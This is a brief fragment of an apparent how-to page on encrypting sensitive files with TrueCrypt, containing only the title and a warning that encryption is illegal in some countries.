How to Encrypt Your Sensitive Files Using TrueCrypt

Warning

  • The use of encryption is illegal in some countries. So before you install this, ensure that this program is legal in your country.